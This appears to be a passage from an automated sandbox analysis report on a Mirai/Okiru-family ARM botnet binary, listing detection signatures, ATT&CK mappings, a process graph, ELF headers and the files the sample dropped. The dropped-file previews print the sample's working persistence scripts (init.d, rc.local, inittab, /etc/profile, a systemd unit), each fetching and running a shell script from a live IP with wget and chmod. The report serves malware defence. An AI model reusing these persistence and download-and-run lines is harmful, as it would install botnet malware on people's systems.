                Source: /usr/bin/chmod (PID: 5509)File: /etc/init.d/arm.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 5427)Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinaryJump to dropped file
                Source: /tmp/arm.nn.elf (PID: 5427)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
                Source: /bin/sh (PID: 5505)Writes shell script file to disk with an unusual file extension: /etc/init.d/arm.nn.elfJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: /tmp/arm.nn.elf (PID: 5427)File: /etc/init.d/mybinaryJump to dropped file
                Source: /bin/sh (PID: 5505)File: /etc/init.d/arm.nn.elfJump to dropped file
                Source: /tmp/arm.nn.elf (PID: 5688)Sleeps longer then 60s: 250.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5751)Sleeps longer then 60s: 200.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5816)Sleeps longer then 60s: 250.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5889)Sleeps longer then 60s: 60.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5981)Sleeps longer then 60s: 200.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6139)Sleeps longer then 60s: 120.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6154)Sleeps longer then 60s: 60.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6178)Sleeps longer then 60s: 60.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6202)Sleeps longer then 60s: 120.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6232)Sleeps longer then 60s: 100.0sJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5427)Queries kernel information via 'uname': Jump to behavior
                Source: arm.nn.elf, 6045.1.00005604e0e85000.00005604e0fd3000.rw-.sdmpBinary or memory string: !/proc/1748/exe0!/proc/726/exe1/usr/libexec/geoclue-2.0/demos/agent!/usr/bin/ibus-daemon!/usr/bin1/proc/802/exe/arm/usr/bin0!/usr/bin/VGAuthService1/proc/3161/exe/arm/sr10!/proc/1745/exe0!/proc/727/exe1/usr/lib/bluetoothm/ro10!/usr/bin/gnome-shell!/usr/bin/vmtoolsd1/usr/lib/x86_64-linux-gnu/tumbler-1!/proc/1691/exe0!/proc/765/exe
                Source: arm.nn.elf, 5445.1.00007fbd2c03e000.00007fbd2c044000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm(<
                Source: arm.nn.elf, 5427.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmpBinary or memory string: /tmp/qemu-open.D5Kv2w
                Source: arm.nn.elf, 5427.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmpBinary or memory string: V/tmp/qemu-open.D5Kv2w
                Source: arm.nn.elf, 5427.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 5445.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 5880.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 5889.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 6018.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 6045.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.nn.elf
                Source: arm.nn.elf, 6045.1.00005604e0e85000.00005604e0fd3000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
                Source: arm.nn.elf, 5427.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 5445.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 5880.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 5889.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 6018.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 6045.1.00005604e0e85000.00005604e0fd3000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                Source: arm.nn.elf, 5427.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 5445.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 5880.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 5889.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 6018.1.00005604e0e85000.00005604e0fd3000.rw-.sdmp, arm.nn.elf, 6045.1.00005604e0e85000.00005604e0fd3000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
                Source: arm.nn.elf, 5427.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 5445.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 5445.1.00007fbd2c03e000.00007fbd2c044000.rw-.sdmp, arm.nn.elf, 5880.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 5889.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 6018.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmp, arm.nn.elf, 6045.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                Source: arm.nn.elf, 5427.1.00007ffdf3b08000.00007ffdf3b29000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
                Source: arm.nn.elf, 5445.1.00007fbd2c03a000.00007fbd2c03e000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd8

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5880.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6045.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5445.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6018.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5880.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6045.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5445.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6018.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 5427, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 5445, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 5880, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 5889, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6018, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6045, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5880.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6045.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5445.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6018.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5880.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6045.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5445.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6018.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 5427, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 5445, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 5880, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 5889, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6018, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6045, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information2
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Unix Shell Configuration Modification
                1
                Unix Shell Configuration Modification
                1
                Masquerading
                1
                OS Credential Dumping
                11
                Security Software Discovery
                Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network Medium1
                Data Manipulation
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Systemd Service
                1
                Systemd Service
                1
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Virtualization/Sandbox Evasion
                Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Scripting
                Logon Script (Windows)2
                File and Directory Permissions Modification
                Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1526568 Sample: arm.nn.elf Startdate: 06/10/2024 Architecture: LINUX Score: 80 63 Antivirus / Scanner detection for submitted sample 2->63 65 Yara detected Okiru 2->65 67 Yara detected Mirai 2->67 8 arm.nn.elf 2->8         started        12 gnome-session-binary sh gsd-housekeeping 2->12         started        14 udisksd dumpe2fs 2->14         started        16 19 other processes 2->16 process3 file4 55 /etc/rc.local, POSIX 8->55 dropped 57 /etc/profile, ASCII 8->57 dropped 59 /etc/init.d/mybinary, POSIX 8->59 dropped 69 Sample tries to set files in /etc globally writable 8->69 71 Sample tries to persist itself using /etc/profile 8->71 73 Drops files in suspicious directories 8->73 75 Sample tries to persist itself using System V runlevels 8->75 18 arm.nn.elf sh 8->18         started        20 arm.nn.elf sh 8->20         started        22 arm.nn.elf sh 8->22         started        24 6 other processes 8->24 signatures5 process6 file7 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        61 /etc/init.d/arm.nn.elf, POSIX 24->61 dropped 77 Drops files in suspicious directories 24->77 35 sh ln 24->35         started        37 arm.nn.elf 24->37         started        39 arm.nn.elf 24->39         started        41 13 other processes 24->41 signatures8 process9 signatures10 79 Sample tries to set files in /etc globally writable 28->79 81 Sample tries to persist itself using System V runlevels 31->81 43 arm.nn.elf 37->43         started        45 arm.nn.elf 39->45         started        47 arm.nn.elf 41->47         started        49 arm.nn.elf 41->49         started        51 arm.nn.elf 41->51         started        53 6 other processes 41->53 process11
                SourceDetectionScannerLabelLink
                arm.nn.elf100%AviraEXP/ELF.Mirai.W
                SourceDetectionScannerLabelLink
                /etc/rc.local0%ReversingLabs
                /etc/rc.local0%VirustotalBrowse
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://154.216.19.140/10%VirustotalBrowse
                http://154.216.19.140/lol.sh4%VirustotalBrowse
                http://154.216.19.140/curl.sh11%VirustotalBrowse
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://154.216.19.140/curl.sharm.nn.elffalseunknown
                http://154.216.19.140/lol.sharm.nn.elffalseunknown
                http://154.216.19.140/arm.nn.elf, profile.12.dr, inittab.12.dr, arm.nn.elf.36.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.drfalseunknown
                No contacted IP infos
                No context
                No context
                No context
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                /etc/rc.localarm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  mipsel.nn.elfGet hashmaliciousOkiruBrowse
                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      x86_32.nn.elfGet hashmaliciousOkiruBrowse
                        x86_64.nn.elfGet hashmaliciousOkiruBrowse
                          mips.nn.elfGet hashmaliciousOkiruBrowse
                            arm5.nn.elfGet hashmaliciousOkiruBrowse
                              arm.nn.elfGet hashmaliciousOkiruBrowse
                                x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    Process:/tmp/arm.nn.elf
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):119
                                    Entropy (8bit):4.635626443373099
                                    Encrypted:false
                                    SSDEEP:3:KPJRX7/LsDFDDoC2ROLUc/KILbaaFOdFXa5O:WJRsZforK/baaeXCO
                                    MD5:F551F8ABFCCC40134B43DE18FAAB5137
                                    SHA1:DF4AFD70A5FC55CFB5197C0E447E7DBF88ABF162
                                    SHA-256:514CF77A503296EA0B148CAA7BB00E22087962945B3A3A82D23B3F371DD2379F
                                    SHA-512:DFA1752E0311B3579341770E4CB51F21D0477A376AA673463C2CF56AFE13722611F26B442503E518CD0CBE9F77FCD1A2BCAF56CFA1CB6E68279E0F6833114FC2
                                    Malicious:false
                                    Reputation:low
                                    Preview:run bootcmd_mmc0; /tmp/arm.nn.elf && wget http://154.216.19.140/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                    Process:/bin/sh
                                    File Type:POSIX shell script, ASCII text executable
                                    Category:dropped
                                    Size (bytes):395
                                    Entropy (8bit):4.508341340864527
                                    Encrypted:false
                                    SSDEEP:12:QRkuXXNxnJ/UJgjvMX22FMuKN+dRRucSOyd3:qmIyX3YOM3
                                    MD5:1FCEEDC8F2BD62E1D314E408D31A65FF
                                    SHA1:DD85DB2BA5A369676BB1E243D7E51588EFB7554B
                                    SHA-256:D98B2D1E37A42B7105CF71DCA8207BEC92CF569A758788CD0E06CD6F5A7959D2
                                    SHA-512:7E88AB057E0F91EE11BF2ADAAB93188F1F1F5B04EBA3E6B138E31CD58B2094A8C00727C73636EC1C42CE4115BAB546C49B687688E737DD0C64E8A6AFA5FBD7BD
                                    Malicious:true
                                    Reputation:low
                                    Preview:#!/bin/sh.# /etc/init.d/arm.nn.elf..case "" in. start). echo 'Starting arm.nn.elf'. /tmp/arm.nn.elf &. wget http://154.216.19.140/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping arm.nn.elf'. killall arm.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                    Process:/tmp/arm.nn.elf
                                    File Type:POSIX shell script, ASCII text executable
                                    Category:dropped
                                    Size (bytes):106
                                    Entropy (8bit):4.651940377594003
                                    Encrypted:false
                                    SSDEEP:3:TKH4vZK7/LsDFDvSDRFbROLUc/KILpaKB0dFLoKE0:h8sZzSXbK/zBeLXE0
                                    MD5:236B3CC3B06252EDD3B9DE245D3E46B8
                                    SHA1:B1207126696A044232B47E10DB8ED9BE991E0E00
                                    SHA-256:A410E6F601D9AB69C4BAA4BBADE4B53A352B8257112F72AA010A0DA831A85627
                                    SHA-512:7198C38C88E13020FD64B110D34E585AD6E37E0138810BCC2CF9A31993769C1EB1F7DE5E979F53A2E46DFA5D5595DAA16CEF56F7CE5BAC53EE553EF5D158ADFE
                                    Malicious:true
                                    Reputation:low
                                    Preview:#!/bin/sh./tmp/arm.nn.elf &.wget http://154.216.19.140/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                    Process:/tmp/arm.nn.elf
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):111
                                    Entropy (8bit):4.568657262651263
                                    Encrypted:false
                                    SSDEEP:3:nAWu5d/LsDFDDoC2ROLUc/KILbaaFOdFXa5O:AUZforK/baaeXCO
                                    MD5:1A74AE1C78CE0091B37C6DDAB5B6A4BD
                                    SHA1:A7139DA46E5213406FB2CEB1A23A95774C93DD8A
                                    SHA-256:C11E467387D76AA4ABE2A90A04BD2918B54ABD5E37ADEA8B5BB31FF3703DB160
                                    SHA-512:7A805E970C97EC0897517C91C7597358D481C04523288208AD8BF681D9469B0272BF27873DD9A1830EC57D6F846F0CB44662C166D5CAADE1D78F5CC68D695D37
                                    Malicious:false
                                    Reputation:low
                                    Preview:::respawn:/tmp/arm.nn.elf && wget http://154.216.19.140/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                    Process:/tmp/arm.nn.elf
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):53
                                    Entropy (8bit):3.871459242626451
                                    Encrypted:false
                                    SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                    MD5:2BD9B4BE30579E633FC0191AA93DF486
                                    SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                    SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                    SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:gorilla botnet is on the device ur not a cat go away.
                                    Process:/tmp/arm.nn.elf
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):102
                                    Entropy (8bit):4.491992175515438
                                    Encrypted:false
                                    SSDEEP:3:Tg7/LsDFDvSDRFbROLUc/KILbaaFOdFXa50:TgsZzSXbK/baaeXC0
                                    MD5:FC8415FCA82354EFC0D8743729E646EF
                                    SHA1:DCF5EAD97640A8258A3EE27CAD8117E8A19D8E84
                                    SHA-256:6FE5E74C3E23E54D110DFAB9F2E703154B9714555F73B9CB967973CDA0AF616F
                                    SHA-512:8128A2152E6CC05E6AC6BE9A59FB812E7CD1ABC65D2252C8F4E75BF3301E219592CB43A5DF26F3127EEE9C00562B78425949B08B5066C5C55C2E8C5EA5E96251
                                    Malicious:true
                                    Reputation:low
                                    Preview:/tmp/arm.nn.elf &.wget http://154.216.19.140/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                    Process:/tmp/arm.nn.elf
                                    File Type:POSIX shell script, ASCII text executable
                                    Category:dropped
                                    Size (bytes):10
                                    Entropy (8bit):3.121928094887362
                                    Encrypted:false
                                    SSDEEP:3:TKH4vn:hv
                                    MD5:3E2B31C72181B87149FF995E7202C0E3
                                    SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                    SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                    SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                    Joe Sandbox View:
                                    • Filename: arm5.nn.elf, Detection: malicious, Browse
                                    • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                    • Filename: arm7.nn.elf, Detection: malicious, Browse
                                    • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                    • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                    • Filename: mips.nn.elf, Detection: malicious, Browse
                                    • Filename: arm5.nn.elf, Detection: malicious, Browse
                                    • Filename: arm.nn.elf, Detection: malicious, Browse
                                    • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                    • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                    Reputation:moderate, very likely benign file
                                    Preview:#!/bin/sh.
                                    Process:/tmp/arm.nn.elf
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):300
                                    Entropy (8bit):5.041050524772764
                                    Encrypted:false
                                    SSDEEP:6:z8ifitRZAMzdK+Yz02+GWRdO4p+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+gp+GWRdJp+GWRXY+GWRuL6
                                    MD5:FDB02D36243EBDC369050AADA9997A04
                                    SHA1:4C9A51F44E5E8CABDAD1E9917986F1384750BEA5
                                    SHA-256:B144D232A72B159AE93C251BB88A64172143C4320384D8A5F9F31ECE1B64E1FF
                                    SHA-512:89056EC33126555F25F0ACB6922D7B52D5C1A13B5143B1D825E242EFCFB694A258E0139B433D22082019B7AC79323EC98E0015382D1706781038050472AE3D71
                                    Malicious:false
                                    Reputation:low
                                    Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/arm.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://154.216.19.140/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                    Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):76
                                    Entropy (8bit):3.7627880354948586
                                    Encrypted:false
                                    SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                    MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                    SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                    SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                    SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                    Process:/tmp/arm.nn.elf
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16
                                    Entropy (8bit):3.5
                                    Encrypted:false
                                    SSDEEP:3:Tg7/LsDln:Tgs5n
                                    MD5:5A9E68CC61A24B23E7CE850CBE55CD38
                                    SHA1:7D53E57B760618566E5B635118604478EE1175B1
                                    SHA-256:300279D18C7FC46D9F271DFDD3D803874D1B222B3512385D9FFFEED712EF1D97
                                    SHA-512:09970D3B321DA48BAEB46B368CF5C40CCB90A0EB76300D7F5B03441FE9161AA5FD26C152CE83DC681397FD2FA81B6AD824092660285B1562F4D326C60517C7F3
                                    Malicious:false
                                    Preview:/tmp/arm.nn.elf.
                                    File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                    Entropy (8bit):6.222835197728757
                                    TrID:
                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                    File name:arm.nn.elf
                                    File size:108'660 bytes
                                    MD5:fa572b646bbb73d97a1bb5e4ac38883f
                                    SHA1:ed43abbd7a464ffedfe22099c2c33af3cbcbd70d
                                    SHA256:f52cf4400acc178aa397fee66c52ac0bc61b1435968c2b76bd79229bac28409d
                                    SHA512:e97cb03e76aeeafd852c98f38bdf51af18a6ca15745bb6d0a33dbe5918eb91c3d8966bd1615363a20695ae3d32321f0ea01cee6e6ae8c7ba27e983f84fe91c10
                                    SSDEEP:1536:V0fMAGT26aU1lu6oQRkGWfp3jFTmTeKhNOzD/5kTfIKvDUCennqlRAS:V0fM93+p3j5mT7ccTDLennjS
                                    TLSH:F9B32A52B9819623C6D626BBF66E02CD372613B8D3EF3217CD15AF24378682B0D7B541
                                    File Content Preview:.ELF...a..........(.........4...........4. ...(.....................@...@...............D...D...D...`....(..........Q.td..................................-...L."....Z..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                    ELF header

                                    Class:ELF32
                                    Data:2's complement, little endian
                                    Version:1 (current)
                                    Machine:ARM
                                    Version Number:0x1
                                    Type:EXEC (Executable file)
                                    OS/ABI:ARM - ABI
                                    ABI Version:0
                                    Entry Point Address:0x8190
                                    Flags:0x202
                                    ELF Header Size:52
                                    Program Header Offset:52
                                    Program Header Size:32
                                    Number of Program Headers:3
                                    Section Header Offset:108260
                                    Section Header Size:40
                                    Number of Section Headers:10
                                    Header String Table Index:9
                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                    NULL0x00x00x00x00x0000
                                    .initPROGBITS0x80940x940x180x00x6AX004
                                    .textPROGBITS0x80b00xb00x16c300x00x6AX0016
                                    .finiPROGBITS0x1ece00x16ce00x140x00x6AX004
                                    .rodataPROGBITS0x1ecf40x16cf40x334c0x00x2A004
                                    .ctorsPROGBITS0x2a0440x1a0440x80x00x3WA004
                                    .dtorsPROGBITS0x2a04c0x1a04c0x80x00x3WA004
                                    .dataPROGBITS0x2a0580x1a0580x64c0x00x3WA004
                                    .bssNOBITS0x2a6a40x1a6a40x22280x00x3WA004
                                    .shstrtabSTRTAB0x00x1a6a40x3e0x00x0001
                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                    LOAD0x00x80000x80000x1a0400x1a0406.22960x5R E0x8000.init .text .fini .rodata
                                    LOAD0x1a0440x2a0440x2a0440x6600x28885.09910x6RW 0x8000.ctors .dtors .data .bss
                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                    Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                    System Behavior

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:/tmp/arm.nn.elf
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/bin/systemctl
                                    Arguments:systemctl enable custom.service
                                    File size:996584 bytes
                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/tmp/arm.nn.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/bin/sh
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):09:43:54
                                    Start date (UTC):06/10/2024
                                    Path:/usr/bin/chmod
                                    Arguments:chmod +x /etc/init.d/mybinary
                                    File size:63864 bytes
